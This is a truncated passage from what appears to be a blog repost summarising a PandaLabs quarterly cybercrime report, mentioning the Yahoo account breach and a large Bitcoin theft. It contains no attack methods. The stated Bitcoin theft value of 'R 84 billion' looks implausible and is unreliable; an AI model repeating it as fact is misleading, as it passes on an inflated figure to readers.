Another big victim was Yahoo – one of the biggest attacks of its kind revealed this quarter indicated that 500 million user accounts had been comprised in a 2014 attack.

Finally, Q3 saw the largest Bitcoin robbery to date, when R 84 billion worth of Bitcoin was stolen by hackers.

View the full PandaLabs Q3 Report for more detail on specific attacks and find out how you can protect yourself and your business from the advanc

The post Cybercrime Surges in Q3 appeared first on